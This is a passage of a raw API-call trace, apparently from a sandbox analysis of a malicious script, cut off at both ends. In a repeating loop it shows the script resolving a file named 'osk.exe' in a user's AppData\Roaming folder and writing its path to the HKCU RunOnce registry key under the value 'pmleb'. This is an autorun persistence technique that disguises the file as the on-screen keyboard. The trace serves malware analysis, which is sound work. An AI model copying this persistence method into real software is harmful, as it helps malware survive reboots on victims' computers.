[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.436] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0079.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.436] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3b [0079.436] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0079.437] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.437] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.437] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.437] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.437] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.437] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.438] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.438] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.438] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.438] RegCloseKey (hKey=0x280) returned 0x0 [0079.438] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.438] SetTimer (hWnd=0x20280, nIDEvent=0x203a, uElapse=0xa, lpTimerFunc=0x0) returned 0x203a [0079.438] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.441] KillTimer (hWnd=0x20280, uIDEvent=0x203a) returned 1 [0079.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.441] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.441] IUnknown:Release (This=0x787518) returned 0x1 [0079.441] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.441] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.441] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.442] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.442] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.442] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0079.442] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.442] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3c [0079.442] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.443] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0079.443] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.443] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.443] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.443] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.443] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.443] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.444] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.444] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.444] RegCloseKey (hKey=0x280) returned 0x0 [0079.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.444] SetTimer (hWnd=0x20280, nIDEvent=0x203b, uElapse=0xa, lpTimerFunc=0x0) returned 0x203b [0079.444] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.456] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.456] KillTimer (hWnd=0x20280, uIDEvent=0x203b) returned 1 [0079.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.457] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.457] IUnknown:Release (This=0x787518) returned 0x1 [0079.457] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.457] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.457] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.457] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.458] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.458] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0079.458] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.458] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3d [0079.458] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.458] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0079.459] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.459] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.459] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.459] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.459] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.459] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.459] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.459] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.459] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.459] RegCloseKey (hKey=0x280) returned 0x0 [0079.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.460] SetTimer (hWnd=0x20280, nIDEvent=0x203c, uElapse=0xa, lpTimerFunc=0x0) returned 0x203c [0079.460] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.472] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.472] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.472] KillTimer (hWnd=0x20280, uIDEvent=0x203c) returned 1 [0079.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.472] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.472] IUnknown:Release (This=0x787518) returned 0x1 [0079.472] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.473] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.473] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.473] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.473] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 